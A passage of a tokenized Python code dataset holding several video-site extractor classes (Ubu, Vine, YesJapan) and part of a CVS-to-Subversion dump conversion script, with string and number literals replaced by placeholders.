. join ( self . _video_fields ) ) , title ) <EOL> formats = [ ] <EOL> for rendition in json [ '<STR_LIT>' ] : <EOL> url = rendition [ '<STR_LIT>' ] or rendition [ '<STR_LIT:url>' ] <EOL> protocol = '<STR_LIT>' if url . startswith ( '<STR_LIT>' ) else '<STR_LIT:http>' <EOL> ext = '<STR_LIT>' if protocol == '<STR_LIT>' else rendition [ '<STR_LIT>' ] . lower ( ) <EOL> if protocol == '<STR_LIT>' : <EOL> url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> formats . append ( { <EOL> '<STR_LIT>' : '<STR_LIT:_>' . join ( [ '<STR_LIT>' , rendition [ '<STR_LIT>' ] . lower ( ) , rendition [ '<STR_LIT>' ] . 
lower ( ) ] ) , <EOL> '<STR_LIT:width>' : rendition [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT:size>' ] , <EOL> '<STR_LIT>' : protocol , <EOL> '<STR_LIT>' : ext , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] . lower ( ) , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] . lower ( ) , <EOL> '<STR_LIT:url>' : url , <EOL> } ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] , <EOL> '<STR_LIT:title>' : json [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : json [ '<STR_LIT>' ] or json [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : formats , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:url>' : json [ '<STR_LIT>' ] <EOL> } , { <EOL> '<STR_LIT:url>' : json [ '<STR_LIT>' ] <EOL> } ] , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] / <NUM_LIT:1000> , <EOL> '<STR_LIT>' : float ( json [ '<STR_LIT>' ] ) / <NUM_LIT:1000> , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] [ '<STR_LIT>' ] if '<STR_LIT>' in json [ '<STR_LIT>' ] else '<STR_LIT>' , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . utils import int_or_none <EOL> class UbuIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id = mobj . group ( '<STR_LIT:id>' ) <EOL> webpage = self . _download_webpage ( url , video_id ) <EOL> title = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT:title>' ) <EOL> duration = int_or_none ( self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' , fatal = False , default = None ) ) <EOL> if duration : <EOL> duration *= <NUM_LIT> <EOL> formats = [ ] <EOL> FORMAT_REGEXES = [ <EOL> [ '<STR_LIT>' , r"<STR_LIT>" ] , <EOL> [ '<STR_LIT>' , r'<STR_LIT>' ] <EOL> ] <EOL> for format_id , format_regex in FORMAT_REGEXES : <EOL> m = re . search ( format_regex , webpage ) <EOL> if m : <EOL> formats . append ( { <EOL> '<STR_LIT:url>' : m . group ( <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : format_id , <EOL> } ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : duration , <EOL> '<STR_LIT>' : formats , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import json <EOL> import itertools <EOL> from . common import InfoExtractor <EOL> from . . utils import unified_strdate <EOL> class VineIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage = self . _download_webpage ( '<STR_LIT>' + video_id , video_id ) <EOL> data = json . loads ( self . _html_search_regex ( <EOL> r'<STR_LIT>' % video_id , webpage , '<STR_LIT>' ) ) <EOL> formats = [ { <EOL> '<STR_LIT:url>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , { <EOL> '<STR_LIT:url>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ] <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : self . _og_search_title ( webpage ) , <EOL> '<STR_LIT>' : self . 
_og_search_description ( webpage ) , <EOL> '<STR_LIT:description>' : data [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : unified_strdate ( data [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : data [ '<STR_LIT:username>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] , <EOL> '<STR_LIT>' : formats , <EOL> } <EOL> class VineUserIE ( InfoExtractor ) : <EOL> IE_NAME = '<STR_LIT>' <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _VINE_BASE_URL = "<STR_LIT>" <EOL> _TESTS = [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> ] <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> user = mobj . group ( '<STR_LIT:user>' ) <EOL> u = mobj . group ( '<STR_LIT:u>' ) <EOL> profile_url = "<STR_LIT>" % ( <EOL> self . _VINE_BASE_URL , '<STR_LIT>' if not u else '<STR_LIT>' , user ) <EOL> profile_data = self . _download_json ( <EOL> profile_url , user , note = '<STR_LIT>' ) <EOL> user_id = profile_data [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> timeline_data = [ ] <EOL> for pagenum in itertools . count ( <NUM_LIT:1> ) : <EOL> timeline_url = "<STR_LIT>" % ( <EOL> self . _VINE_BASE_URL , user_id , pagenum ) <EOL> timeline_page = self . _download_json ( <EOL> timeline_url , user , note = '<STR_LIT>' % pagenum ) <EOL> timeline_data . extend ( timeline_page [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> if timeline_page [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] is None : <EOL> break <EOL> entries = [ <EOL> self . url_result ( e [ '<STR_LIT>' ] , '<STR_LIT>' ) for e in timeline_data ] <EOL> return self . playlist_result ( entries , user ) </s>
<s> from __future__ import unicode_literals <EOL> from . common import InfoExtractor <EOL> from . . utils import ( <EOL> HEADRequest , <EOL> get_element_by_attribute , <EOL> parse_iso8601 , <EOL> ) <EOL> class YesJapanIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage = self . _download_webpage ( url , video_id ) <EOL> title = self . _og_search_title ( webpage ) <EOL> video_url = self . _og_search_video_url ( webpage ) <EOL> description = self . _og_search_description ( webpage ) <EOL> thumbnail = self . _og_search_thumbnail ( webpage ) <EOL> timestamp = None <EOL> submit_info = get_element_by_attribute ( '<STR_LIT:class>' , '<STR_LIT>' , webpage ) <EOL> if submit_info : <EOL> timestamp = parse_iso8601 ( self . _search_regex ( <EOL> r'<STR_LIT>' , submit_info , '<STR_LIT>' , fatal = False , default = None ) ) <EOL> redirect_req = HEADRequest ( video_url ) <EOL> req = self . _request_webpage ( <EOL> redirect_req , video_id , note = '<STR_LIT>' , errnote = '<STR_LIT>' , fatal = False ) <EOL> if req : <EOL> video_url = req . geturl ( ) <EOL> formats = [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : video_url , <EOL> } ] <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : formats , <EOL> '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : thumbnail , <EOL> } </s>
<s> import getopt <EOL> import os <EOL> import rcsparse <EOL> import re <EOL> import string <EOL> import subprocess <EOL> import sys <EOL> import time <EOL> from hashlib import md5 <EOL> from svn import core , fs , delta , repos <EOL> CHANGESET_FUZZ_SEC = <NUM_LIT> <EOL> def usage ( ) : <EOL> print >> sys . stderr , '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> def main ( ) : <EOL> email_domain = None <EOL> do_incremental = False <EOL> dump_all = False <EOL> log_encoding = '<STR_LIT>' <EOL> rcs = RcsKeywords ( ) ; <EOL> modules = [ ] <EOL> fuzzsec = CHANGESET_FUZZ_SEC <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT>' ) <EOL> for opt , v in opts : <EOL> if opt == '<STR_LIT>' : <EOL> fuzzsec = int ( v ) <EOL> elif opt == '<STR_LIT>' : <EOL> email_domain = v <EOL> elif opt == '<STR_LIT>' : <EOL> dump_all = True <EOL> elif opt == '<STR_LIT>' : <EOL> log_encoding = v <EOL> elif opt == '<STR_LIT>' : <EOL> rcs . add_id_keyword ( v ) <EOL> elif opt == '<STR_LIT>' : <EOL> modules . append ( v ) <EOL> elif opt == '<STR_LIT>' : <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except Exception , msg : <EOL> print >> sys . stderr , msg <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if len ( args ) != <NUM_LIT:1> and len ( args ) != <NUM_LIT:3> : <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> log_encodings = log_encoding . split ( '<STR_LIT:U+002C>' ) <EOL> cvsroot = args [ <NUM_LIT:0> ] <EOL> while cvsroot [ - <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> cvsroot = cvsroot [ : - <NUM_LIT:1> ] <EOL> if len ( args ) == <NUM_LIT:3> : <EOL> svnroot = args [ <NUM_LIT:1> ] <EOL> svnpath = args [ <NUM_LIT:2> ] <EOL> else : <EOL> svnroot = None <EOL> svnpath = None <EOL> if svnroot is None : <EOL> svn = SvnDumper ( ) <EOL> else : <EOL> svn = SvnDumper ( svnpath ) <EOL> try : <EOL> svn . load ( svnroot ) <EOL> if svn . last_rev is not None : <EOL> do_incremental = True <EOL> print >> sys . stderr , '<STR_LIT>' % ( svn . 
last_rev , svn . last_author ) <EOL> except : <EOL> pass <EOL> if do_incremental and email_domain is not None and svn . last_author . lower ( ) . endswith ( ( '<STR_LIT:@>' + email_domain ) . lower ( ) ) : <EOL> last_author = svn . last_author [ : - <NUM_LIT:1> * ( <NUM_LIT:1> + len ( email_domain ) ) ] <EOL> else : <EOL> last_author = svn . last_author <EOL> cvs = CvsConv ( cvsroot , rcs , not do_incremental , fuzzsec ) <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> if len ( modules ) == <NUM_LIT:0> : <EOL> cvs . walk ( ) <EOL> else : <EOL> for module in modules : <EOL> cvs . walk ( module ) <EOL> svn . dump = True <EOL> changesets = sorted ( cvs . changesets ) <EOL> nchangesets = len ( changesets ) <EOL> print >> sys . stderr , '<STR_LIT>' % ( nchangesets ) <EOL> if nchangesets <= <NUM_LIT:0> : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if not dump_all : <EOL> max_time_max = changesets [ - <NUM_LIT:1> ] . max_time - <NUM_LIT> <EOL> else : <EOL> max_time_max = changesets [ - <NUM_LIT:1> ] . max_time <EOL> printOnce = False <EOL> found_last_revision = False <EOL> for i , k in enumerate ( changesets ) : <EOL> if do_incremental and not found_last_revision : <EOL> if k . min_time == svn . last_date and k . author == last_author : <EOL> found_last_revision = True <EOL> continue <EOL> if k . max_time > max_time_max : <EOL> break <EOL> if not printOnce : <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> printOnce = True <EOL> finfo = k . revs [ <NUM_LIT:0> ] <EOL> rcsfile = rcsparse . rcsfile ( finfo . path ) <EOL> log = rcsparse . rcsfile ( k . revs [ <NUM_LIT:0> ] . path ) . getlog ( k . revs [ <NUM_LIT:0> ] . rev ) <EOL> for i , e in enumerate ( log_encodings ) : <EOL> try : <EOL> how = '<STR_LIT:ignore>' if i == len ( log_encodings ) - <NUM_LIT:1> else '<STR_LIT:strict>' ; <EOL> log = log . decode ( e , how ) <EOL> break <EOL> except : <EOL> pass <EOL> log = log . encode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) <EOL> if email_domain is None : <EOL> email = k . 
author <EOL> else : <EOL> email = k . author + '<STR_LIT:@>' + email_domain <EOL> revprops = str_prop ( '<STR_LIT>' , email ) <EOL> revprops += str_prop ( '<STR_LIT>' , svn_time ( k . min_time ) ) <EOL> revprops += str_prop ( '<STR_LIT>' , log ) <EOL> revprops += '<STR_LIT>' <EOL> print '<STR_LIT>' % ( i + <NUM_LIT:1> ) <EOL> print '<STR_LIT>' % ( len ( revprops ) ) <EOL> print '<STR_LIT>' % ( len ( revprops ) ) <EOL> print '<STR_LIT>' <EOL> print revprops <EOL> for f in k . revs : <EOL> rcsfile = rcsparse . rcsfile ( f . path ) <EOL> fileprops = '<STR_LIT>' <EOL> if os . access ( f . path , os . X_OK ) : <EOL> fileprops += str_prop ( '<STR_LIT>' , '<STR_LIT:*>' ) <EOL> fileprops += '<STR_LIT>' <EOL> filecont = rcs . expand_keyword ( f . path , f . rev ) <EOL> md5sum = md5 ( ) <EOL> md5sum . update ( filecont ) <EOL> p = node_path ( cvs . cvsroot , svnpath , f . path ) <EOL> if f . state == '<STR_LIT>' : <EOL> if not svn . exists ( p ) : <EOL> print >> sys . stderr , "<STR_LIT>" "<STR_LIT>" % ( p ) <EOL> continue <EOL> print '<STR_LIT>' % ( p ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> svn . remove ( p ) <EOL> continue <EOL> elif not svn . exists ( p ) : <EOL> svn . add ( p ) <EOL> print '<STR_LIT>' % ( p ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' % ( p ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % ( len ( fileprops ) ) <EOL> print '<STR_LIT>' % ( len ( filecont ) ) <EOL> print '<STR_LIT>' % ( md5sum . hexdigest ( ) ) <EOL> print '<STR_LIT>' % ( len ( fileprops ) + len ( filecont ) ) <EOL> print '<STR_LIT>' <EOL> print fileprops + filecont <EOL> print '<STR_LIT>' <EOL> if do_incremental and not found_last_revision : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> class FileRevision : <EOL> def __init__ ( self , path , rev , state , markseq ) : <EOL> self . path = path <EOL> self . rev = rev <EOL> self . 
state = state <EOL> self . markseq = markseq <EOL> class ChangeSetKey : <EOL> def __init__ ( self , branch , author , time , log , commitid , fuzzsec ) : <EOL> self . branch = branch <EOL> self . author = author <EOL> self . min_time = time <EOL> self . max_time = time <EOL> self . commitid = commitid <EOL> self . fuzzsec = fuzzsec <EOL> self . revs = [ ] <EOL> self . tags = [ ] <EOL> self . log_hash = <NUM_LIT:0> <EOL> h = <NUM_LIT:0> <EOL> for c in log : <EOL> h = <NUM_LIT> * h + ord ( c ) <EOL> self . log_hash = h <EOL> def __cmp__ ( self , anon ) : <EOL> if isinstance ( anon , ChangeSetKey ) : <EOL> cid = cmp ( self . commitid , anon . commitid ) <EOL> if cid == <NUM_LIT:0> and self . commitid is not None : <EOL> return <NUM_LIT:0> <EOL> ma = anon . min_time - self . max_time <EOL> mi = self . min_time - anon . max_time <EOL> ct = self . min_time - anon . min_time <EOL> if ma > self . fuzzsec or mi > self . fuzzsec : <EOL> return ct <EOL> if cid != <NUM_LIT:0> : <EOL> return cid if ct == <NUM_LIT:0> else ct <EOL> c = cmp ( self . log_hash , anon . log_hash ) <EOL> if c == <NUM_LIT:0> : c = cmp ( self . branch , anon . branch ) <EOL> if c == <NUM_LIT:0> : c = cmp ( self . author , anon . author ) <EOL> if c == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return ct if ct != <NUM_LIT:0> else c <EOL> return - <NUM_LIT:1> <EOL> def merge ( self , anon ) : <EOL> self . max_time = max ( self . max_time , anon . max_time ) <EOL> self . min_time = min ( self . min_time , anon . min_time ) <EOL> self . revs . extend ( anon . revs ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . branch + '<STR_LIT:/>' + self . author ) * <NUM_LIT> + self . log_hash <EOL> def put_file ( self , path , rev , state , markseq ) : <EOL> self . revs . append ( FileRevision ( path , rev , state , markseq ) ) <EOL> class CvsConv : <EOL> def __init__ ( self , cvsroot , rcs , dumpfile , fuzzsec ) : <EOL> self . cvsroot = cvsroot <EOL> self . rcs = rcs <EOL> self . 
changesets = dict ( ) <EOL> self . dumpfile = dumpfile <EOL> self . markseq = <NUM_LIT:0> <EOL> self . tags = dict ( ) <EOL> self . fuzzsec = fuzzsec <EOL> def walk ( self , module = None ) : <EOL> p = [ self . cvsroot ] <EOL> if module is not None : p . append ( module ) <EOL> path = reduce ( os . path . join , p ) <EOL> for root , dirs , files in os . walk ( path ) : <EOL> for f in files : <EOL> if not f [ - <NUM_LIT:2> : ] == '<STR_LIT>' : continue <EOL> self . parse_file ( root + os . sep + f ) <EOL> for t , c in self . tags . items ( ) : <EOL> c . tags . append ( t ) <EOL> def parse_file ( self , path ) : <EOL> rtags = dict ( ) <EOL> rcsfile = rcsparse . rcsfile ( path ) <EOL> path_related = path [ len ( self . cvsroot ) + <NUM_LIT:1> : ] [ : - <NUM_LIT:2> ] <EOL> branches = { '<STR_LIT:1>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> have_111 = False <EOL> for k , v in rcsfile . symbols . items ( ) : <EOL> r = v . split ( '<STR_LIT:.>' ) <EOL> if len ( r ) == <NUM_LIT:3> : <EOL> branches [ v ] = '<STR_LIT>' <EOL> elif len ( r ) >= <NUM_LIT:3> and r [ - <NUM_LIT:2> ] == '<STR_LIT:0>' : <EOL> z = reduce ( lambda a , b : a + '<STR_LIT:.>' + b , r [ : - <NUM_LIT:2> ] + r [ - <NUM_LIT:1> : ] ) <EOL> branches [ reduce ( lambda a , b : a + '<STR_LIT:.>' + b , r [ : - <NUM_LIT:2> ] + r [ - <NUM_LIT:1> : ] ) ] = k <EOL> if len ( r ) == <NUM_LIT:2> and branches [ r [ <NUM_LIT:0> ] ] == '<STR_LIT>' : <EOL> if not rtags . has_key ( v ) : <EOL> rtags [ v ] = list ( ) <EOL> rtags [ v ] . append ( k ) <EOL> revs = sorted ( rcsfile . revs . items ( ) , lambda a , b : cmp ( a [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] , b [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) or cmp ( b [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , a [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) ) <EOL> p = '<STR_LIT:0>' <EOL> novendor = False <EOL> have_initial_revision = False <EOL> last_vendor_status = None <EOL> for k , v in revs : <EOL> r = k . 
split ( '<STR_LIT:.>' ) <EOL> if len ( r ) == <NUM_LIT:4> and r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] == '<STR_LIT:1>' and r [ <NUM_LIT:2> ] == '<STR_LIT:1>' and r [ <NUM_LIT:3> ] == '<STR_LIT:1>' : <EOL> if have_initial_revision : <EOL> continue <EOL> if v [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> continue <EOL> last_vendor_status = v [ <NUM_LIT:3> ] <EOL> have_initial_revision = True <EOL> elif len ( r ) == <NUM_LIT:4> and r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] == '<STR_LIT:1>' and r [ <NUM_LIT:2> ] == '<STR_LIT:1>' : <EOL> if novendor : <EOL> continue <EOL> last_vendor_status = v [ <NUM_LIT:3> ] <EOL> elif len ( r ) == <NUM_LIT:2> : <EOL> if r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] == '<STR_LIT:1>' : <EOL> if have_initial_revision : <EOL> continue <EOL> if v [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> continue <EOL> have_initial_revision = True <EOL> elif r [ <NUM_LIT:0> ] == '<STR_LIT:1>' and r [ <NUM_LIT:1> ] != '<STR_LIT:1>' : <EOL> novendor = True <EOL> if last_vendor_status == '<STR_LIT>' and v [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> last_vendor_status = None <EOL> continue <EOL> last_vendor_status = None <EOL> else : <EOL> continue <EOL> if self . dumpfile : <EOL> self . markseq = self . markseq + <NUM_LIT:1> <EOL> b = reduce ( lambda a , b : a + '<STR_LIT:.>' + b , r [ : - <NUM_LIT:1> ] ) <EOL> try : <EOL> a = ChangeSetKey ( branches [ b ] , v [ <NUM_LIT:2> ] , v [ <NUM_LIT:1> ] , rcsfile . getlog ( v [ <NUM_LIT:0> ] ) , <EOL> v [ <NUM_LIT:6> ] , self . fuzzsec ) <EOL> except Exception as e : <EOL> print >> sys . stderr , '<STR_LIT>' % ( path , v [ <NUM_LIT:0> ] ) <EOL> raise e <EOL> a . put_file ( path , k , v [ <NUM_LIT:3> ] , self . markseq ) <EOL> while self . changesets . has_key ( a ) : <EOL> c = self . changesets [ a ] <EOL> del self . changesets [ a ] <EOL> c . merge ( a ) <EOL> a = c <EOL> self . changesets [ a ] = a <EOL> p = k <EOL> if rtags . 
has_key ( k ) : <EOL> for t in rtags [ k ] : <EOL> if not self . tags . has_key ( t ) or self . tags [ t ] . max_time < a . max_time : <EOL> self . tags [ t ] = a <EOL> def node_path ( r , n , p ) : <EOL> if r . endswith ( '<STR_LIT:/>' ) : <EOL> r = r [ : - <NUM_LIT:1> ] <EOL> path = p [ : - <NUM_LIT:2> ] <EOL> p = path . split ( '<STR_LIT:/>' ) <EOL> if len ( p ) > <NUM_LIT:0> and p [ - <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> path = string . join ( p [ : - <NUM_LIT:2> ] , '<STR_LIT:/>' ) + '<STR_LIT:/>' + p [ - <NUM_LIT:1> ] <EOL> if path . startswith ( r ) : <EOL> path = path [ len ( r ) + <NUM_LIT:1> : ] <EOL> if n is None or len ( n ) == <NUM_LIT:0> : <EOL> return path <EOL> return '<STR_LIT>' % ( n , path ) <EOL> def str_prop ( k , v ) : <EOL> return '<STR_LIT>' % ( len ( k ) , k , len ( v ) , v ) <EOL> def svn_time ( t ) : <EOL> import time <EOL> return time . strftime ( "<STR_LIT>" , time . gmtime ( t ) ) <EOL> class SvnDumper : <EOL> def __init__ ( self , root = '<STR_LIT>' ) : <EOL> self . root = root <EOL> if self . root != '<STR_LIT>' and self . root [ - <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> self . root = self . root [ : - <NUM_LIT:1> ] <EOL> self . dirs = { } <EOL> self . dirs [ self . root ] = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> self . dump = False <EOL> def exists ( self , path ) : <EOL> d = os . path . dirname ( path ) <EOL> if not self . dirs . has_key ( d ) : <EOL> return False <EOL> return self . dirs [ d ] . has_key ( os . path . basename ( path ) ) <EOL> def add ( self , path ) : <EOL> d = os . path . dirname ( path ) <EOL> if not self . dirs . has_key ( d ) : <EOL> self . mkdir ( d ) <EOL> self . dirs [ d ] [ os . path . basename ( path ) ] = <NUM_LIT:1> <EOL> def remove ( self , path ) : <EOL> d = os . path . dirname ( path ) <EOL> if d == path : <EOL> return <EOL> del self . dirs [ d ] [ os . path . basename ( path ) ] <EOL> self . rmdir ( d ) <EOL> def rmdir ( self , path ) : <EOL> if len ( self . 
dirs [ path ] ) > <NUM_LIT:0> : <EOL> return <EOL> for r in self . dirs . keys ( ) : <EOL> if r != path and r . startswith ( path + '<STR_LIT:/>' ) : <EOL> return <EOL> if self . dump : <EOL> print '<STR_LIT>' % ( path ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> del self . dirs [ path ] <EOL> d = os . path . dirname ( path ) <EOL> if d == path or not self . dirs . has_key ( d ) : <EOL> return <EOL> self . rmdir ( d ) <EOL> def mkdir ( self , path ) : <EOL> if not self . dirs . has_key ( path ) : <EOL> d = os . path . dirname ( path ) <EOL> if d == path : <EOL> return <EOL> self . mkdir ( d ) <EOL> if self . dump : <EOL> print '<STR_LIT>' % ( path ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> self . dirs [ path ] = { } <EOL> def load ( self , repo_path ) : <EOL> repo_path = core . svn_path_canonicalize ( repo_path ) <EOL> repos_ptr = repos . open ( repo_path ) <EOL> fs_ptr = repos . fs ( repos_ptr ) <EOL> rev = fs . youngest_rev ( fs_ptr ) <EOL> base_root = fs . revision_root ( fs_ptr , <NUM_LIT:0> ) <EOL> root = fs . revision_root ( fs_ptr , rev ) <EOL> hist = fs . node_history ( root , self . root ) <EOL> while hist is not None : <EOL> hist = fs . history_prev ( hist , <NUM_LIT:0> ) <EOL> dummy , rev = fs . history_location ( hist ) <EOL> d = fs . revision_prop ( fs_ptr , rev , core . SVN_PROP_REVISION_DATE ) <EOL> author = fs . revision_prop ( fs_ptr , rev , core . SVN_PROP_REVISION_AUTHOR ) <EOL> if author == '<STR_LIT>' : <EOL> continue <EOL> self . last_author = author <EOL> self . last_date = core . svn_time_from_cstring ( d ) / <NUM_LIT> <EOL> self . last_rev = rev <EOL> def authz_cb ( root , path , pool ) : <EOL> return <NUM_LIT:1> <EOL> editor = SvnDumperEditor ( self ) <EOL> e_ptr , e_baton = delta . make_editor ( editor ) <EOL> repos . dir_delta ( base_root , '<STR_LIT>' , '<STR_LIT>' , root , self . 
root , e_ptr , e_baton , <EOL> authz_cb , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> break <EOL> class SvnDumperEditor ( delta . Editor ) : <EOL> def __init__ ( self , dumper ) : <EOL> self . dumper = dumper <EOL> def add_file ( self , path , * args ) : <EOL> self . dumper . add ( self . dumper . root + '<STR_LIT:/>' + path ) <EOL> def add_directory ( self , path , * args ) : <EOL> self . dumper . mkdir ( self . dumper . root + '<STR_LIT:/>' + path ) <EOL> class RcsKeywords : <EOL> RCS_KW_AUTHOR = ( <NUM_LIT:1> << <NUM_LIT:0> ) <EOL> RCS_KW_DATE = ( <NUM_LIT:1> << <NUM_LIT:1> ) <EOL> RCS_KW_LOG = ( <NUM_LIT:1> << <NUM_LIT:2> ) <EOL> RCS_KW_NAME = ( <NUM_LIT:1> << <NUM_LIT:3> ) <EOL> RCS_KW_RCSFILE = ( <NUM_LIT:1> << <NUM_LIT:4> ) <EOL> RCS_KW_REVISION = ( <NUM_LIT:1> << <NUM_LIT:5> ) <EOL> RCS_KW_SOURCE = ( <NUM_LIT:1> << <NUM_LIT:6> ) <EOL> RCS_KW_STATE = ( <NUM_LIT:1> << <NUM_LIT:7> ) <EOL> RCS_KW_FULLPATH = ( <NUM_LIT:1> << <NUM_LIT:8> ) <EOL> RCS_KW_MDOCDATE = ( 